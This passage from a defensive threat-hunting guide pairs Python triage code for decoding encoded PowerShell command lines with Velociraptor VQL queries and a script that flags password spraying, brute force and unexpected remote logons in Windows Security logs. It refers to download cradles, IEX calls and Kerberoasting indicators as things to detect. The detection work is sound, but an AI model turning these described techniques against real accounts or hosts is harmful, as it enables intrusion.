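    except (ValueError, UnicodeDecodeError):
        return None


def triage_row(row):
    """Apply every check to one pslist row; returns a finding dict or None."""
    cmdline = row.get("CommandLine") or ""
    decoded = decode_encoded_command(cmdline)
    # Score the decoded script together with the visible command line
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    flags = [name for name, rx in CHECKS if rx.search(haystack)]
    if decoded is not None:
        flags.append("encoded-command")
    if not flags:
        return None
    return {"Pid": row.get("Pid"), "Name": row.get("Name"),
            "Flags": sorted(flags), "Decoded": decoded}


def triage_hunt(jsonl):
    """Triage a JSON-lines hunt export; returns the findings in row order."""
    findings = []
    for line in jsonl.splitlines():
        if line.strip():
            finding = triage_row(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in triage_hunt(SAMPLE_ROWS):
        print(json.dumps(finding, indent=2))
```

Scoring the decoded script as well as the raw command line is the point: the download cradle and the IEX call in the sample are only visible after decoding, which is exactly what the encoding is meant to hide from a naive command-line match.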

7. Identity & Logon Activity Monitoring

Description: Monitoring logon events can reveal compromised accounts, brute force attempts, and unusual authentication patterns, which may indicate an ongoing attack.

Example Velociraptor Artifact: Windows.EventLogs.Security

  • Artifact Description: Collects Windows security logs related to user logon and authentication activities.

5 Example VQL Queries for Identity & Logon Monitoring:

  1. Query: Detect failed logon attempts (Event ID 4625).

SELECT System.TimeCreated.SystemTime AS Time, EventData.TargetUserName AS User, EventData.IpAddress AS Source, EventData.LogonType AS LogonType, EventData.Status AS Status FROM parse_evtx(filename='C:/Windows/System32/winevt/Logs/Security.evtx') WHERE System.EventID.Value = 4625

Description: Tracks failed logon attempts that may indicate brute force or password guessing attacks; many accounts failing from one source is the signature of password spraying, one account failing repeatedly is brute force.

  2. Query: Detect suspicious logon activities from foreign IP addresses.

SELECT System.TimeCreated.SystemTime AS Time, EventData.TargetUserName AS User, EventData.IpAddress AS Source, EventData.LogonType AS LogonType FROM parse_evtx(filename='C:/Windows/System32/winevt/Logs/Security.evtx') WHERE System.EventID.Value = 4624 AND NOT EventData.IpAddress =~ '^(10[.]|192[.]168[.]|172[.](1[6-9]|2[0-9]|3[01])[.]|127[.]|::1$|-$)'

Description: Monitors for successful logons whose source address is outside the private and loopback ranges (local logons report "-"); substitute your own list of expected networks for the pattern.

  3. Query: Monitor logons using administrative accounts (Event ID 4672).

SELECT System.TimeCreated.SystemTime AS Time, EventData.SubjectUserName AS User, EventData.PrivilegeList AS Privileges FROM parse_evtx(filename='C:/Windows/System32/winevt/Logs/Security.evtx') WHERE System.EventID.Value = 4672

Description: Tracks privileged logons and the privileges assigned, which may indicate abuse or compromise of admin credentials; filter out the SYSTEM and service accounts that generate most of these events.

  4. Query: Detect abnormal logon types, such as network logons (Event ID 4624).

SELECT System.TimeCreated.SystemTime AS Time, EventData.TargetUserName AS User, EventData.IpAddress AS Source, EventData.WorkstationName AS Workstation, EventData.AuthenticationPackageName AS Package FROM parse_evtx(filename='C:/Windows/System32/winevt/Logs/Security.evtx') WHERE System.EventID.Value = 4624 AND EventData.LogonType = 3

Description: Monitors network (logon type 3) logons, often used in lateral movement and remote access; the authentication package shows whether NTLM or Kerberos was used.

  5. Query: Detect Kerberos ticket-granting-service (TGS) requests (Event ID 4769).

SELECT System.TimeCreated.SystemTime AS Time, EventData.TargetUserName AS User, EventData.ServiceName AS Service, EventData.IpAddress AS Source, EventData.TicketEncryptionType AS EncType FROM parse_evtx(filename='C:/Windows/System32/winevt/Logs/Security.evtx') WHERE System.EventID.Value = 4769

Description: Tracks Kerberos TGS requests, often used in pass-the-ticket attacks; these are logged on domain controllers only, and RC4 (0x17) tickets for service accounts are the classic Kerberoasting indicator.
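The logon queries above each return raw events; turning them into a verdict means grouping failures by source and checking successful remote logons against what is expected. The Python below is an added example (not code from this page or from the Velociraptor project) that does both over rows in the shape parse_evtx() emits, serving this section and the lateral-movement checks in section 4. The thresholds, the sliding-window size, the jump-host allowlist and every event row are constructed assumptions for the example.

```python
"""Hunt Security-log logon events for spraying, brute force and remote logons.

Added example, not code from the RootGuard page or from the Velociraptor
project. It consumes rows in the shape Velociraptor's parse_evtx() emits
(System.EventID.Value, System.TimeCreated.SystemTime, EventData.*), for
instance exported from a hunt over Security.evtx, and applies the checks
behind the section 7 (and section 4) queries: 4625 bursts per source address,
split into password spraying (many accounts) and brute force (many attempts),
and 4624 network (type 3) or RDP (type 10) logons from addresses outside an
allowlist. Every event row below is constructed for this example.
"""
import ipaddress
from collections import defaultdict


def ev(event_id, ts, user, ip, logon_type=3, status=None):
    """Build one constructed parse_evtx-style row (timestamps are epoch seconds)."""
    data = {"TargetUserName": user, "IpAddress": ip, "LogonType": logon_type}
    if status is not None:
        data["Status"] = status  # NTSTATUS code as 4625 reports it
    return {"System": {"EventID": {"Value": event_id},
                       "TimeCreated": {"SystemTime": ts}},
            "EventData": data}


SAMPLE_EVENTS = (
    # Password spray: one source, twelve accounts, one failure each, 60 s apart
    [ev(4625, 1700000000 + 60 * i, f"user{i:02d}", "10.0.5.23", status="0xC000006D")
     for i in range(12)]
    # Brute force: one account hammered 25 times from one workstation
    + [ev(4625, 1700001000 + 5 * i, "svc_backup", "10.0.7.9", status="0xC000006A")
       for i in range(25)]
    # Benign: a typo from the jump host, then a successful RDP logon
    + [ev(4625, 1700002000, "alice", "10.0.1.10", status="0xC000006A"),
       ev(4624, 1700002030, "alice", "10.0.1.10", logon_type=10)]
    # Successful RDP logon from an address outside the allowlist
    + [ev(4624, 1700003000, "administrator", "203.0.113.77", logon_type=10)]
    # Local console logon: IpAddress is "-" for these
    + [ev(4624, 1700003100, "bob", "-", logon_type=2)]
)

# Hypothetical allowlist of jump-host / admin networks; tune per environment
ALLOWED_SOURCES = [ipaddress.ip_network("10.0.1.0/24")]


def _event_id(row):
    return row["System"]["EventID"]["Value"]


def _ts(row):
    return row["System"]["TimeCreated"]["SystemTime"]


def failed_logon_stats(rows, window=600, min_accounts=10, min_attempts=20):
    """Slide a window over the 4625 events of each source address and keep the
    densest burst. A burst touching min_accounts distinct users is reported as
    password spraying; one with min_attempts attempts as brute force."""
    per_ip = defaultdict(list)
    for r in rows:
        if _event_id(r) == 4625:
            per_ip[r["EventData"]["IpAddress"]].append(r)
    report = {}
    for ip, evs in per_ip.items():
        evs.sort(key=_ts)
        best_attempts = best_accounts = 0
        start = 0
        for end in range(len(evs)):
            while _ts(evs[end]) - _ts(evs[start]) > window:
                start += 1
            burst = evs[start:end + 1]
            accounts = len({r["EventData"]["TargetUserName"] for r in burst})
            if (len(burst), accounts) > (best_attempts, best_accounts):
                best_attempts, best_accounts = len(burst), accounts
        if best_accounts >= min_accounts:
            verdict = "password-spray"
        elif best_attempts >= min_attempts:
            verdict = "brute-force"
        else:
            continue
        report[ip] = {"attempts": best_attempts, "accounts": best_accounts, "verdict": verdict}
    return report


def remote_logons_outside_allowlist(rows, allowed=ALLOWED_SOURCES):
    """Return 4624 events of logon type 3 (network) or 10 (RDP) whose source
    address is not inside any allowed network; sources that are not IP
    addresses ("-" for console logons) are skipped."""
    hits = []
    for r in rows:
        data = r["EventData"]
        if _event_id(r) != 4624 or data["LogonType"] not in (3, 10):
            continue
        try:
            src = ipaddress.ip_address(data["IpAddress"])
        except ValueError:
            continue
        if not any(src in net for net in allowed):
            hits.append({"user": data["TargetUserName"], "source": str(src),
                         "logon_type": data["LogonType"]})
    return hits


if __name__ == "__main__":
    print(failed_logon_stats(SAMPLE_EVENTS))
    print(remote_logons_outside_allowlist(SAMPLE_EVENTS))
```

The window is what separates a spray from background noise: the spraying source here never fails the same account twice, so a per-account counter would miss it, while the per-source window catches eleven distinct accounts inside ten minutes.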
